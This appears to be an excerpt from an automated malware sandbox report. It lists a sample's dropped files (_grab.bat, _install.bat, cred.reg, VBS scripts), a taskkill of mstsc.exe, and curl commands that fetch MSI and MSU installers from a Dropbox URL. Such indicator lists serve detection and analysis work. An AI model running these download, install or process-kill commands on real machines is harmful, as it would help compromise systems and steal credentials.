Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im mstsc.exe
- %TEMP%\RarSFX0\_hotfixes.bat
- %TEMP%\RarSFX0\user32.vbs
- %TEMP%\RarSFX0\user64.vbs
- %TEMP%\RarSFX0\curl.exe
- %TEMP%\RarSFX0\_grab.bat
- %TEMP%\RarSFX0\_install.bat
- %TEMP%\RarSFX0\cred.reg
- 'dl.#####oxusercontent.com':443
- DNS ASK dl.#####oxusercontent.com
- ClassName: '' WindowName: ''
- ClassName: 'EDIT' WindowName: ''
- '%TEMP%\RarSFX0\curl.exe' -O -k https://dl.dropboxusercontent.com/u/50972183/__installpack/TSScanMSI.msi
- '%TEMP%\RarSFX0\curl.exe' -O -k https://dl.dropboxusercontent.com/u/50972183/__installpack/132.msu
- '%TEMP%\RarSFX0\curl.exe' -O -k https://dl.dropboxusercontent.com/u/50972183/__installpack/ims.msi
- '%TEMP%\RarSFX0\curl.exe' -O -k https://dl.dropboxusercontent.com/u/50972183/__installpack/TSPrintMSI.msi
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\RarSFX0\_grab.bat" "